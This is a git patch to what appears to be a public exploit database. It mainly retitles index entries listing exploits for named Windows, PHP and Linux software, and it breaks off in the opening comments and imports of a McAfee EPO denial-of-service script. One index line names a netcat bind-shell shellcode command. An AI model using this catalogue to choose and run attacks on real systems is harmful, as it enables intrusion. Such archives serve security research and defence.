From a6cc99bac3177da4a058fb5f1ba20cc98bb3d00e Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Wed, 5 Aug 2015 05:02:03 +0000 Subject: [PATCH] DB: 2015-08-05 --- files.csv | 48 ++--- platforms/windows/dos/5343.py | 150 +++++++------- platforms/windows/dos/5344.py | 42 ++-- platforms/windows/dos/599.py | 6 +- platforms/windows/local/1985.py | 172 ++++++++-------- platforms/windows/local/5462.py | 330 +++++++++++++++--------------- platforms/windows/remote/1378.py | 272 ++++++++++++------------ platforms/windows/remote/2258.py | 304 +++++++++++++-------------- platforms/windows/remote/3616.py | 290 +++++++++++++------------- platforms/windows/remote/4027.py | 214 +++++++++---------- platforms/windows/remote/4573.py | 200 +++++++++--------- platforms/windows/remote/4657.py | 250 +++++++++++----------- platforms/windows/remote/4724.py | 178 ++++++++-------- platforms/windows/remote/663.py | 6 +- platforms/windows/remote/7410.htm | 110 +++++----- platforms/windows/remote/9559.pl | 288 +++++++++++++------------- 16 files changed, 1430 insertions(+), 1430 deletions(-) diff --git a/files.csv b/files.csv index 201d0103c..3152587a9 100755 --- a/files.csv +++ b/files.csv @@ -459,7 +459,7 @@ id,file,description,date,author,platform,type,port 593,platforms/windows/dos/593.pl,"Quick 'n EasY 2.4 - Ftp Server Remote DoS",2004-10-24,KaGra,windows,dos,0 594,platforms/windows/dos/594.pl,"BaSoMail Server 1.24 POP3/SMTP Remote Denial of Service Exploit",2004-10-24,KaGra,windows,dos,0 598,platforms/windows/remote/598.py,"MailCarrier 2.51 - SMTP EHLO / HELO Buffer Overflow Exploit",2004-10-26,muts,windows,remote,25 -599,platforms/windows/dos/599.py,"BaSoMail Multiple Buffer Overflow Denial of Service Exploit",2004-10-26,muts,windows,dos,0 +599,platforms/windows/dos/599.py,"BaSoMail - Multiple Buffer Overflow Denial of Service Exploit",2004-10-26,muts,windows,dos,0 600,platforms/linux/local/600.c,"GD Graphics Library Heap Overflow Proof of Concept Exploit",2004-10-26,N/A,linux,local,0 601,platforms/linux/local/601.c,"libxml 2.6.12 nanoftp Remote Buffer Overflow Proof of Concept Exploit",2004-10-26,infamous41md,linux,local,0 602,platforms/sco/local/602.c,"SCO Openserver 5.0.7 (MMDF deliver) Local Root Exploit",2004-10-26,"Ramon Valle",sco,local,0 @@ -510,7 +510,7 @@ id,file,description,date,author,platform,type,port 659,platforms/cgi/webapps/659.txt,"EZshopper - Directory Transversal (loadpage.cgi)",2004-11-25,"Zero X",cgi,webapps,0 660,platforms/linux/remote/660.c,"PHP <= 4.3.7/ 5.0.0RC3 memory_limit Remote Exploit",2004-11-27,"Gyan Chawdhary",linux,remote,80 662,platforms/windows/dos/662.pl,"3Dmax 6.x backburner Manager <= 2.2 - Denial of Service Exploit",2004-11-28,Xtiger,windows,dos,0 -663,platforms/windows/remote/663.py,"Mercury Mail 4.01 (Pegasus) IMAP Buffer Overflow Exploit",2004-11-29,muts,windows,remote,143 +663,platforms/windows/remote/663.py,"Mercury Mail 4.01 - (Pegasus) IMAP Buffer Overflow Exploit",2004-11-29,muts,windows,remote,143 664,platforms/windows/dos/664.c,"WS_FTP Server <= 5.03 MKD Remote Buffer Overflow Exploit",2004-11-29,NoPh0BiA,windows,dos,0 665,platforms/windows/dos/665.c,"Orbz Game <= 2.10 - Remote Buffer Overflow Exploit",2004-11-29,"Luigi Auriemma",windows,dos,0 667,platforms/windows/dos/667.c,"Jana Server <= 2.4.4 (http/pna) Denial of Service Exploit",2004-11-30,"Luigi Auriemma",windows,dos,0 @@ -1147,9 +1147,9 @@ id,file,description,date,author,platform,type,port 1375,platforms/windows/remote/1375.pl,"Mercury Mail Transport System 4.01b Remote Exploit (PH SERVER)",2005-12-16,kingcope,windows,remote,105 1376,platforms/windows/dos/1376.c,"Microsoft Windows IIS - Malformed HTTP Request Denial of Service Exploit (c)",2005-12-19,Kozan,windows,dos,0 1377,platforms/windows/dos/1377.pl,"Microsoft Windows IIS - Malformed HTTP Request Denial of Service Exploit (pl)",2005-12-19,kokanin,windows,dos,0 -1378,platforms/windows/remote/1378.py,"MailEnable Enterprise Edition 1.1 (EXAMINE) Buffer Overflow Exploit",2005-12-19,muts,windows,remote,0 +1378,platforms/windows/remote/1378.py,"MailEnable Enterprise Edition 1.1 - (EXAMINE) Buffer Overflow Exploit",2005-12-19,muts,windows,remote,0 1379,platforms/php/webapps/1379.php,"PHPGedView <= 3.3.7 - Arbitrary Remote Code Execution Exploit",2005-12-20,rgod,php,webapps,0 -1380,platforms/windows/remote/1380.py,"Eudora Qualcomm WorldMail 3.0 (IMAPd) Remote Overflow Exploit",2005-12-20,muts,windows,remote,143 +1380,platforms/windows/remote/1380.py,"Eudora Qualcomm WorldMail 3.0 - (IMAPd) Remote Overflow Exploit",2005-12-20,muts,windows,remote,143 1381,platforms/windows/remote/1381.pm,"Golden FTP Server <= 1.92 - (APPE) Remote Overflow Exploit (meta)",2005-12-20,redsand,windows,remote,21 1382,platforms/php/webapps/1382.pl,"phpBB <= 2.0.18 - Remote Bruteforce/Dictionary Attack Tool (updated)",2006-02-20,DarkFig,php,webapps,0 1383,platforms/php/webapps/1383.txt,"phpBB <= 2.0.18 - Remote XSS Cookie Disclosure Exploit",2005-12-21,jet,php,webapps,0 @@ -1690,7 +1690,7 @@ id,file,description,date,author,platform,type,port 1982,platforms/php/webapps/1982.txt,"WonderEdit Pro CMS (template_path) - Remote File Include Vulnerabilities",2006-07-04,OLiBekaS,php,webapps,0 1983,platforms/php/webapps/1983.txt,"MyPHP CMS <= 0.3 (domain) Remote File Include Vulnerability",2006-07-05,Kw3[R]Ln,php,webapps,0 1984,platforms/windows/dos/1984.py,"WinRAR <= 3.60 beta 6 (SFX Path) Stack Overflow Exploit PoC",2006-07-05,posidron,windows,dos,0 -1985,platforms/windows/local/1985.py,"WinRAR <= 3.60 beta 6 (SFX Path) Local Stack Overflow Exploit",2006-07-05,muts,windows,local,0 +1985,platforms/windows/local/1985.py,"WinRAR <= 3.60 beta 6 - (SFX Path) Local Stack Overflow Exploit",2006-07-05,muts,windows,local,0 1986,platforms/windows/local/1986.cpp,"Microsoft Excel 2000/2003 Hlink Local Buffer Overflow Exploit (french)",2006-07-06,NSRocket,windows,local,0 1987,platforms/asp/webapps/1987.txt,"Hosting Controller <= 6.1 Hotfix 3.1 Privilege Escalation Vulnerability",2006-07-06,"Soroush Dalili",asp,webapps,0 1988,platforms/windows/local/1988.pl,"Microsoft Excel 2003 Hlink Local Buffer Overflow Exploit (italian)",2006-07-06,oveRet,windows,local,0 @@ -1951,7 +1951,7 @@ id,file,description,date,author,platform,type,port 2255,platforms/php/webapps/2255.txt,"eFiction < 2.0.7 - Remote Admin Authentication Bypass Vulnerability",2006-08-25,Vipsta,php,webapps,0 2256,platforms/php/webapps/2256.txt,"Integramod Portal <= 2.0 rc2 (phpbb_root_path) Remote File Include",2006-08-25,MATASANOS,php,webapps,0 2257,platforms/php/webapps/2257.txt,"CliServ Web Community <= 0.65 (cl_headers) Include Vulnerability",2006-08-25,Kacper,php,webapps,0 -2258,platforms/windows/remote/2258.py,"MDaemon POP3 Server < 9.06 (USER) Remote Heap Overflow Exploit",2006-08-26,muts,windows,remote,110 +2258,platforms/windows/remote/2258.py,"MDaemon POP3 Server < 9.06 - (USER) Remote Heap Overflow Exploit",2006-08-26,muts,windows,remote,110 2259,platforms/php/webapps/2259.txt,"proManager <= 0.73 (note.php) Remote SQL Injection Vulnerability",2006-08-26,Kacper,php,webapps,0 2260,platforms/php/webapps/2260.pl,"AlberT-EasySite <= 1.0a5 (PSA_PATH) Remote File Include Exploit",2006-08-27,Kacper,php,webapps,0 2261,platforms/php/webapps/2261.php,"iziContents <= RC6 GLOBALS[] Remote Code Execution Exploit",2006-08-27,Kacper,php,webapps,0 @@ -3274,7 +3274,7 @@ id,file,description,date,author,platform,type,port 3613,platforms/php/webapps/3613.txt,"phpBB MOD Forum picture and META tags 1.7 RFI Vulnerability",2007-03-30,bd0rk,php,webapps,0 3614,platforms/php/webapps/3614.txt,"JSBoard 2.0.10 (login.php table) Local File Inclusion Vulnerability",2007-03-30,GoLd_M,php,webapps,0 3615,platforms/linux/remote/3615.c,"dproxy-nexgen Remote Root Buffer Overflow Exploit (x86-lnx)",2007-03-30,mu-b,linux,remote,53 -3616,platforms/windows/remote/3616.py,"IBM Lotus Domino Server 6.5 PRE AUTH Remote Exploit",2007-03-31,muts,windows,remote,143 +3616,platforms/windows/remote/3616.py,"IBM Lotus Domino Server 6.5 - PRE AUTH Remote Exploit",2007-03-31,muts,windows,remote,143 3617,platforms/windows/local/3617.cpp,"Microsoft Windows - Animated Cursor (.ANI) Stack Overflow Exploit",2007-03-31,devcode,windows,local,0 3618,platforms/php/webapps/3618.htm,"XOOPS Module Lykos Reviews 1.00 (index.php) SQL Injection Exploit",2007-03-31,ajann,php,webapps,0 3619,platforms/php/webapps/3619.pl,"XOOPS Module Library (viewcat.php) Remote SQL Injection Exploit",2007-03-31,ajann,php,webapps,0 @@ -3677,7 +3677,7 @@ id,file,description,date,author,platform,type,port 4024,platforms/windows/local/4024.rb,"DVD X Player 4.1 Professional .PLF file Buffer Overflow Exploit",2007-06-02,n00b,windows,local,0 4025,platforms/php/webapps/4025.php,"Quick.Cart <= 2.2 RFI/LFI Remote Code Execution Exploit",2007-06-02,Kacper,php,webapps,0 4026,platforms/php/webapps/4026.php,"PNphpBB2 <= 1.2 - (index.php c) Remote SQL Injection Exploit",2007-06-03,Kacper,php,webapps,0 -4027,platforms/windows/remote/4027.py,"IBM Tivoli Provisioning Manager PRE AUTH Remote Exploit",2007-06-03,muts,windows,remote,8080 +4027,platforms/windows/remote/4027.py,"IBM Tivoli Provisioning Manager - PRE AUTH Remote Exploit",2007-06-03,muts,windows,remote,8080 4028,platforms/linux/local/4028.txt,"screen 4.0.3 - Local Authentication Bypass Vulnerability (OpenBSD)",2008-06-18,Rembrandt,linux,local,0 4029,platforms/php/webapps/4029.php,"Sendcard <= 3.4.1 (Local File Inclusion) Remote Code Execution Exploit",2007-06-04,Silentz,php,webapps,0 4030,platforms/php/webapps/4030.php,"EQdkp <= 1.3.2 (listmembers.php rank) Remote SQL Injection Exploit",2007-06-04,Silentz,php,webapps,0 @@ -4216,7 +4216,7 @@ id,file,description,date,author,platform,type,port 4570,platforms/multiple/local/4570.pl,"Oracle 10g/11g SYS.LT.FINDRICSET Local SQL Injection Exploit",2007-10-27,bunker,multiple,local,0 4571,platforms/multiple/local/4571.pl,"Oracle 10g/11g SYS.LT.FINDRICSET Local SQL Injection Exploit (2)",2007-10-27,bunker,multiple,local,0 4572,platforms/multiple/local/4572.txt,"Oracle 10g LT.FINDRICSET Local SQL Injection Exploit (IDS evasion)",2007-10-27,sh2kerr,multiple,local,0 -4573,platforms/windows/remote/4573.py,"IBM Tivoli Storage Manager 5.3 Express CAD Service BoF Exploit",2007-10-27,muts,windows,remote,1581 +4573,platforms/windows/remote/4573.py,"IBM Tivoli Storage Manager 5.3 - Express CAD Service BoF Exploit",2007-10-27,muts,windows,remote,1581 4574,platforms/windows/remote/4574.pl,"IBM Lotus Domino 7.0.2FP1 IMAP4 Server LSUB Command Exploit",2007-10-27,FistFuXXer,windows,remote,143 4575,platforms/php/webapps/4575.txt,"GoSamba 1.0.1 (include_path) Multiple RFI Vulnerabilities",2007-10-27,GoLd_M,php,webapps,0 4576,platforms/php/webapps/4576.txt,"JobSite Professional 2.0 file.php Remote SQL Injection Vulnerability",2007-10-28,ZynbER,php,webapps,0 @@ -4299,7 +4299,7 @@ id,file,description,date,author,platform,type,port 4654,platforms/php/webapps/4654.txt,"PBLang <= 4.99.17.q Remote File Rewriting / Command Execution",2007-11-24,KiNgOfThEwOrLd,php,webapps,0 4655,platforms/php/webapps/4655.txt,"project alumni <= 1.0.9 - Remote XSS / SQL Injection Vulnerability",2007-11-24,tomplixsee,php,webapps,0 4656,platforms/php/webapps/4656.txt,"RunCMS <= 1.6 - Local File Inclusion Vulnerability",2007-11-24,BugReport.IR,php,webapps,0 -4657,platforms/windows/remote/4657.py,"Apple QuickTime 7.2/7.3 RTSP Response Universal Exploit (IE7/FF/Opera)",2007-11-26,muts,windows,remote,0 +4657,platforms/windows/remote/4657.py,"Apple QuickTime 7.2/7.3 - RTSP Response Universal Exploit (IE7/FF/Opera)",2007-11-26,muts,windows,remote,0 4658,platforms/php/webapps/4658.php,"RunCMS <= 1.6 disclaimer.php Remote File Overwrite Exploit",2007-11-25,BugReport.IR,php,webapps,0 4659,platforms/php/webapps/4659.txt,"IAPR COMMENCE 1.3 - Multiple Remote File Inclusion Vulnerability",2007-11-25,ShAy6oOoN,php,webapps,0 4660,platforms/php/webapps/4660.pl,"Softbiz Freelancers Script 1 - Remote SQL Injection Exploit",2007-11-25,IRCRASH,php,webapps,0 @@ -4366,7 +4366,7 @@ id,file,description,date,author,platform,type,port 4721,platforms/php/webapps/4721.txt,"Wordpress <= 2.3.1 - Charset Remote SQL Injection Vulnerability",2007-12-11,"Abel Cheung",php,webapps,0 4722,platforms/php/webapps/4722.txt,"viart cms/shop/helpdesk 3.3.2 - Remote File Inclusion Vulnerability",2007-12-11,RoMaNcYxHaCkEr,php,webapps,0 4723,platforms/osx/dos/4723.c,"Apple Mac OS X xnu <= 1228.0 - super_blob Local kernel Denial of Service PoC",2007-12-12,mu-b,osx,dos,0 -4724,platforms/windows/remote/4724.py,"HP OpenView Network Node Manager 07.50 CGI Remote BoF Exploit",2007-12-12,muts,windows,remote,80 +4724,platforms/windows/remote/4724.py,"HP OpenView Network Node Manager 07.50 - CGI Remote BoF Exploit",2007-12-12,muts,windows,remote,80 4725,platforms/php/webapps/4725.txt,"Fastpublish CMS 1.9999 config[fsBase] RFI Vulnerability",2007-12-12,RoMaNcYxHaCkEr,php,webapps,0 4726,platforms/php/webapps/4726.txt,"CityWriter 0.9.7 head.php Remote File Inclusion Vulnerability",2007-12-13,RoMaNcYxHaCkEr,php,webapps,0 4727,platforms/php/webapps/4727.txt,"CMS Galaxie Software (category_id) Remote SQL Injection Vulnerability",2007-12-13,MurderSkillz,php,webapps,0 @@ -4974,8 +4974,8 @@ id,file,description,date,author,platform,type,port 5340,platforms/php/webapps/5340.txt,"RunCMS Module bamagalerie3 - Remote SQL Injection Vulnerability",2008-04-01,DreamTurk,php,webapps,0 5341,platforms/windows/dos/5341.pl,"Noticeware Email Server 4.6.1.0 - Denial of Service Exploit",2008-04-01,Ray,windows,dos,0 5342,platforms/windows/remote/5342.py,"HP OpenView NNM 7.5.1 - OVAS.exe SEH PRE AUTH Overflow Exploit",2008-04-02,muts,windows,remote,7510 -5343,platforms/windows/dos/5343.py,"Mcafee EPO 4.0 FrameworkService.exe Remote Denial of Service Exploit",2008-04-02,muts,windows,dos,0 -5344,platforms/windows/dos/5344.py,"Novel eDirectory HTTP Denial of Service Exploit",2008-04-02,muts,windows,dos,0 +5343,platforms/windows/dos/5343.py,"Mcafee EPO 4.0 - FrameworkService.exe Remote Denial of Service Exploit",2008-04-02,muts,windows,dos,0 +5344,platforms/windows/dos/5344.py,"Novel eDirectory HTTP - Denial of Service Exploit",2008-04-02,muts,windows,dos,0 5345,platforms/php/webapps/5345.txt,"Joomla Component OnlineFlashQuiz <= 1.0.2 RFI Vulnerability",2008-04-02,NoGe,php,webapps,0 5346,platforms/windows/local/5346.pl,"XnView 1.92.1 Slideshow (FontName) Buffer Overflow Exploit",2008-04-02,haluznik,windows,local,0 5347,platforms/php/webapps/5347.txt,"DaZPHP 0.1 (prefixdir) Local File Inclusion Vulnerability",2008-04-02,w0cker,php,webapps,0 @@ -5092,7 +5092,7 @@ id,file,description,date,author,platform,type,port 5459,platforms/php/webapps/5459.txt,"e107 module 123 flash chat 6.8.0 - Remote File Inclusion Vulnerability",2008-04-17,by_casper41,php,webapps,0 5460,platforms/windows/dos/5460.html,"Microsoft Works 7 WkImgSrv.dll ActiveX Denial of Service PoC",2008-04-17,"Shennan Wang",windows,dos,0 5461,platforms/windows/remote/5461.rb,"Intel Centrino ipw2200BG Wireless Driver Remote BoF Exploit (meta)",2008-04-17,oveRet,windows,remote,0 -5462,platforms/windows/local/5462.py,"DivX Player 6.6.0 SRT File SEH Buffer Overflow Exploit",2008-04-18,muts,windows,local,0 +5462,platforms/windows/local/5462.py,"DivX Player 6.6.0 - .SRT File SEH Buffer Overflow Exploit",2008-04-18,muts,windows,local,0 5463,platforms/php/webapps/5463.txt,"Grape Statistics 0.2a (location) Remote File Inclusion Vulnerability",2008-04-18,MajnOoNxHaCkEr,php,webapps,0 5464,platforms/php/webapps/5464.txt,"5th Avenue Shopping Cart (category_ID) SQL Injection Vulnerability",2008-04-18,"Aria-Security Team",php,webapps,0 5465,platforms/php/webapps/5465.txt,"2532/Gigs <= 1.2.2 - Arbitrary Database Backup/Download Vulnerability",2008-04-18,t0pP8uZz,php,webapps,0 @@ -6951,7 +6951,7 @@ id,file,description,date,author,platform,type,port 7407,platforms/php/webapps/7407.txt,"Webmaster Marketplace (member.php u) SQL Injection Vulnerability",2008-12-10,"Hussin X",php,webapps,0 7408,platforms/php/webapps/7408.txt,"living Local 1.1 (xss-rfu) Multiple Vulnerabilities",2008-12-10,Bgh7,php,webapps,0 7409,platforms/php/webapps/7409.txt,"Pro Chat Rooms 3.0.2 (XSS/CSRF) Multiple Vulnerabilities",2008-12-10,ZynbER,php,webapps,0 -7410,platforms/windows/remote/7410.htm,"Microsoft Internet Explorer - XML Parsing Buffer Overflow Exploit (vista) (0day)",2008-12-10,muts,windows,remote,0 +7410,platforms/windows/remote/7410.htm,"Microsoft Internet Explorer - XML Parsing Buffer Overflow Exploit (Vista) (0day)",2008-12-10,muts,windows,remote,0 7411,platforms/php/webapps/7411.txt,"Butterfly Organizer 2.0.1 (view.php id) SQL Injection Vulnerability",2008-12-10,Osirys,php,webapps,0 7412,platforms/asp/webapps/7412.txt,"cf shopkart 5.2.2 (sql/dd) Multiple Vulnerabilities",2008-12-10,AlpHaNiX,asp,webapps,0 7413,platforms/asp/webapps/7413.pl,"CF_Calendar (calendarevent.cfm) Remote SQL Injection Exploit",2008-12-10,AlpHaNiX,asp,webapps,0 @@ -9020,7 +9020,7 @@ id,file,description,date,author,platform,type,port 9554,platforms/windows/dos/9554.html,"Apple iPhone 2.2.1/3.x (MobileSafari) Crash & Reboot Exploit",2009-08-31,TheLeader,windows,dos,0 9555,platforms/php/webapps/9555.txt,"Mybuxscript PTC-BUX (spnews.php) SQL Injection Vulnerability",2009-08-31,HxH,php,webapps,0 9556,platforms/php/webapps/9556.php,"osCommerce Online Merchant 2.2 RC2a Code Execution Exploit",2009-08-31,flyh4t,php,webapps,0 -9559,platforms/windows/remote/9559.pl,"Microsoft IIS 5.0 FTP Server Remote Stack Overflow Exploit (win2k sp4)",2009-09-01,muts,windows,remote,21 +9559,platforms/windows/remote/9559.pl,"Microsoft IIS 5.0 - FTP Server Remote Stack Overflow Exploit (win2k sp4)",2009-09-01,muts,windows,remote,21 9560,platforms/windows/local/9560.txt,"Soritong MP3 Player 1.0 - (.m3u/UI.txt) Universal Local BoF Exploits",2009-09-01,hack4love,windows,local,0 9561,platforms/windows/dos/9561.py,"AIMP2 Audio Converter <= 2.53b330 - (.pls/.m3u) Unicode Crash PoC",2009-09-01,mr_me,windows,dos,0 9562,platforms/asp/webapps/9562.txt,"JSFTemplating / Mojarra Scales / GlassFish - File Disclosure Vulnerabilities",2009-09-01,"SEC Consult",asp,webapps,0 @@ -12519,7 +12519,7 @@ id,file,description,date,author,platform,type,port 14232,platforms/php/webapps/14232.txt,"Joomla JPodium Component (com_jpodium) SQL Injection Vulnerability",2010-07-05,RoAd_KiLlEr,php,webapps,0 14233,platforms/php/webapps/14233.txt,"Bs Auction Script SQL Injection Vulnerability",2010-07-05,Sid3^effects,php,webapps,0 14234,platforms/linux/shellcode/14234.c,"125 bind port to 6778 XOR encoded polymorphic linux shellcode .",2010-07-05,gunslinger_,linux,shellcode,0 -14236,platforms/windows/dos/14236.txt,"Sun Java Web Server 7.0 u7 Admin Interface DoS",2010-07-06,muts,windows,dos,8800 +14236,platforms/windows/dos/14236.txt,"Sun Java Web Server 7.0 u7 - Admin Interface DoS",2010-07-06,muts,windows,dos,8800 14235,platforms/linux/shellcode/14235.c,"nc -lp 31337 -e /bin//sh polymorphic linux shellcode (91 bytes)",2010-07-05,gunslinger_,linux,shellcode,0 14237,platforms/php/webapps/14237.txt,"IBM Bladecenter Management - Multiple Web application vulnerabilities",2010-07-06,"Alexey Sintsov",php,webapps,0 14238,platforms/php/webapps/14238.txt,"BS Auction <= SQL Injection Vulnerability Exploit",2010-07-06,"Easy Laster",php,webapps,0 @@ -17259,7 +17259,7 @@ id,file,description,date,author,platform,type,port 19899,platforms/cgi/dos/19899.txt,"UltraBoard 1.6 DoS Vulnerability",2000-05-05,"Juan M. Bello Rivas",cgi,dos,0 19900,platforms/linux/local/19900.c,"RedHat Linux 6.0/6.1/6.2 pam_console Vulnerability",2000-05-03,"Michal Zalewski",linux,local,0 19901,platforms/hardware/remote/19901.txt,"Netopia R-series routers 4.6.2 Vulnerability",2000-05-16,"Stephen Friedl",hardware,remote,0 -20010,platforms/php/webapps/20010.txt,"X-Cart Gold 4.5 (products_map.php symb parameter) XSS Vulnerability",2012-07-21,muts,php,webapps,0 +20010,platforms/php/webapps/20010.txt,"X-Cart Gold 4.5 - (products_map.php symb parameter) XSS Vulnerability",2012-07-21,muts,php,webapps,0 19906,platforms/multiple/remote/19906.txt,"Matt Wright FormMail 1.6/1.7/1.8 Environmental Variables Disclosure Vulnerability",2000-05-10,"Black Watch Labs",multiple,remote,0 19907,platforms/windows/dos/19907.txt,"Microsoft IIS 4.0/5.0 Malformed File Extension DoS Vulnerability",2000-05-11,"Ussr Labs",windows,dos,0 19908,platforms/windows/remote/19908.txt,"Microsoft IIS 4.0/5.0 Malformed Filename Request Vulnerability",2000-05-11,"Cerberus Security Team",windows,remote,0 @@ -17379,17 +17379,17 @@ id,file,description,date,author,platform,type,port 20030,platforms/unix/remote/20030.c,"wu-ftpd 2.4.2/2.5 .0/2.6.0 - Remote Format String Stack Overwrite (1)",1999-10-15,tf8,unix,remote,0 20031,platforms/linux/remote/20031.c,"wu-ftpd 2.4.2/2.5 .0/2.6.0 - Remote Format String Stack Overwrite (2)",2000-09-26,vsz_,linux,remote,0 20032,platforms/lin_x86/remote/20032.txt,"wu-ftpd 2.4.2/2.5 .0/2.6.0 - Remote Format String Stack Overwrite (3)",2001-05-04,justme,lin_x86,remote,0 -20033,platforms/php/webapps/20033.py,"Dell SonicWALL Scrutinizer 9.0.1 (statusFilter.php q parameter) SQL Injection",2012-07-22,muts,php,webapps,0 +20033,platforms/php/webapps/20033.py,"Dell SonicWALL Scrutinizer 9.0.1 - (statusFilter.php q parameter) SQL Injection",2012-07-22,muts,php,webapps,0 20035,platforms/asp/webapps/20035.js,"ipswitch whatsup gold 15.02 - Stored XSS - blind SQLi - rce",2012-07-22,muts,asp,webapps,0 20036,platforms/windows/local/20036.pl,"Photodex ProShow Producer 5.0.3256 - Local Buffer Overflow Exploit",2012-07-23,mr.pr0n,windows,local,0 20037,platforms/linux/webapps/20037.txt,"Atmail WebAdmin and Webmail Control Panel SQL Root Password Disclosure",2012-07-23,Ciph3r,linux,webapps,0 -20038,platforms/linux/webapps/20038.py,"Symantec Web Gateway 5.0.2 (blocked.php id parameter) Blind SQL Injection",2012-07-23,muts,linux,webapps,0 +20038,platforms/linux/webapps/20038.py,"Symantec Web Gateway 5.0.2 - (blocked.php id parameter) Blind SQL Injection",2012-07-23,muts,linux,webapps,0 20039,platforms/windows/dos/20039.java,"LeafDigital LeafChat 1.7 DoS Vulnerability",2000-06-25,"MDMA Crew",windows,dos,0 20040,platforms/windows/remote/20040.c,"SapporoWorks WinProxy 2.0/2.0.1 - Buffer Overflow Vulnerability",2000-06-27,UNYUN,windows,remote,0 20041,platforms/cgi/remote/20041.txt,"Flowerfire Sawmill 5.0.21 File Access Vulnerability",2000-06-26,"Larry W. Cashdollar",cgi,remote,0 20042,platforms/unix/local/20042.c,"Flowerfire Sawmill 5.0.21 Weak Password Encryption Vulnerability",2000-06-26,"Larry W. Cashdollar",unix,local,0 20043,platforms/linux/remote/20043.c,"DALnet Bahamut IRCd 4.6.5 - _SUMMON_ Buffer Overflow Vulnerability",2000-06-29,"Matt Conover",linux,remote,0 -20044,platforms/php/webapps/20044.txt,"Symantec Web Gateway 5.0.3.18 Blind SQLi Backdoor via MySQL Triggers",2012-07-23,muts,php,webapps,0 +20044,platforms/php/webapps/20044.txt,"Symantec Web Gateway 5.0.3.18 - Blind SQLi Backdoor via MySQL Triggers",2012-07-23,muts,php,webapps,0 20045,platforms/linux/local/20045.c,"X 11.0/3.3.3/3.3.4/3.3.5/3.3.6/4.0 libX11 _XAsyncReply() Stack Corruption",2000-06-19,"Chris Evans",linux,local,0 20046,platforms/unix/remote/20046.txt,"Netscape Professional Services FTP Server (LDAP Aware) 1.3.6 FTP Server Vulnerability",2000-06-21,"Michael Zalewski",unix,remote,0 20048,platforms/windows/remote/20048.txt,"Microsoft Windows 2000 - Remote CPU-overload Vulnerability",2000-06-30,"SecureXpert Labs",windows,remote,0 @@ -17406,7 +17406,7 @@ id,file,description,date,author,platform,type,port 20059,platforms/cgi/remote/20059.txt,"CGI-World Poll It 2.0 Internal Variable Override Vulnerability",2000-07-04,"Adrian Daminato",cgi,remote,0 20060,platforms/linux/remote/20060.c,"BitchX IRC Client 75p1/75p3/1.0 c16 - _/INVITE_ Format String Vulnerability",2000-07-05,RaiSe,linux,remote,0 20061,platforms/linux/remote/20061.c,"Canna Canna 3.5 b2 - Remote Buffer Overflow Vulnerability",2000-07-02,UNYUN,linux,remote,0 -20062,platforms/php/webapps/20062.py,"AlienVault OSSIM 3.1 Reflected XSS and Blind SQL Injection",2012-07-23,muts,php,webapps,0 +20062,platforms/php/webapps/20062.py,"AlienVault OSSIM 3.1 - Reflected XSS and Blind SQL Injection",2012-07-23,muts,php,webapps,0 20063,platforms/windows/webapps/20063.txt,"Spiceworks 5.3.75941 - Stored XSS and Post-Auth SQL Injection",2012-07-23,dookie,windows,webapps,0 20064,platforms/linux/remote/20064.py,"Symantec Web Gateway 5.0.3.18 - LFI Remote ROOT RCE Exploit",2012-07-24,muts,linux,remote,0 20065,platforms/windows/remote/20065.txt,"DrPhibez and Nitro187 Guild FTPD 0.9.7 File Existence Disclosure Vulnerability",2000-07-08,"Andrew Lewis",windows,remote,0 @@ -17431,7 +17431,7 @@ id,file,description,date,author,platform,type,port 20085,platforms/cgi/remote/20085.txt,"Computer Software Manufaktur Alibaba 2.0 Piped Command Vulnerability",2000-07-18,Prizm,cgi,remote,0 20086,platforms/windows/remote/20086.c,"OReilly Software WebSite Professional 2.3.18/2.4/2.4.9 - 'webfind.exe' Buffer Overflow",2000-06-01,"Robert Horton",windows,remote,0 20087,platforms/php/webapps/20087.py,"Zabbix <= 2.0.1 - Session Extractor (0day)",2012-07-24,muts,php,webapps,0 -20088,platforms/linux/remote/20088.py,"Symantec Web Gateway 5.0.3.18 pbcontrol.php ROOT RCE Exploit",2012-07-24,muts,linux,remote,0 +20088,platforms/linux/remote/20088.py,"Symantec Web Gateway 5.0.3.18 - pbcontrol.php ROOT RCE Exploit",2012-07-24,muts,linux,remote,0 20089,platforms/windows/remote/20089.txt,"Microsoft IIS 4.0/5.0 Source Fragment Disclosure Vulnerability",2000-07-17,"Zuo Lei",windows,remote,0 20090,platforms/hardware/remote/20090.txt,"HP JetDirect J3111A Invalid FTP Command DoS Vulnerability",2000-07-19,"Peter Grundl",hardware,remote,0 20091,platforms/multiple/remote/20091.txt,"Stalker Communigate Pro 3.2.4 - Arbitrary File Read Vulnerability",2000-04-03,S21Sec,multiple,remote,0 @@ -17696,7 +17696,7 @@ id,file,description,date,author,platform,type,port 20365,platforms/php/webapps/20365.py,"Wordpress Plugin ThreeWP Email Reflector 1.13 - Stored XSS",2012-08-08,loneferret,php,webapps,0 20366,platforms/windows/webapps/20366.py,"winwebmail server 3.8.1.6 - Stored XSS",2012-08-08,loneferret,windows,webapps,0 20367,platforms/windows/webapps/20367.py,"xeams email server 4.4 build 5720 - Stored XSS",2012-08-08,loneferret,windows,webapps,0 -20368,platforms/windows/webapps/20368.py,"IBM Proventia Network Mail Security System 2.5 POST File Read",2012-08-08,muts,windows,webapps,0 +20368,platforms/windows/webapps/20368.py,"IBM Proventia Network Mail Security System 2.5 - POST File Read",2012-08-08,muts,windows,webapps,0 20369,platforms/hardware/remote/20369.sh,"Cisco PIX Firewall 5.2 PASV Mode FTP Internal Address Disclosure Vulnerability",2000-10-03,"Fabio Pietrosanti",hardware,remote,0 20370,platforms/cgi/remote/20370.txt,"Kootenay Web Inc whois 1.0 - Remote Command Execution Vulnerability",2000-10-29,"Mark Stratman",cgi,remote,0 20371,platforms/windows/remote/20371.txt,"Microsoft Windows 95/WfW smbclient Directory Traversal Vulnerability",1995-10-30,"Dan Shearer",windows,remote,0 diff --git a/platforms/windows/dos/5343.py b/platforms/windows/dos/5343.py index 1f17ce8c5..eb8fcc0aa 100755 --- a/platforms/windows/dos/5343.py +++ b/platforms/windows/dos/5343.py @@ -1,75 +1,75 @@ -#!/usr/bin/python -# Mcafee EPO 4.0 (and others) FrameworkService.exe DOS -# More than meets the eye -# Discovered and coded by Mati Aharoni -# muts..at..offensive-security.com -# http://www.offensive-security.com/0day/mcafee_again.py.txt - - -# EAX 00840C30 -# ECX 00837830 -# EDX 01EACF18 -# EBX 00004000 -# ESP 01EAFF04 -# EBP 01EAFF38 -# ESI 00837830 -# EDI 643AC780 naCmnLib.CnaLogger::AddMessageA -# EIP 42424242 - -import socket -import os -import sys -from time 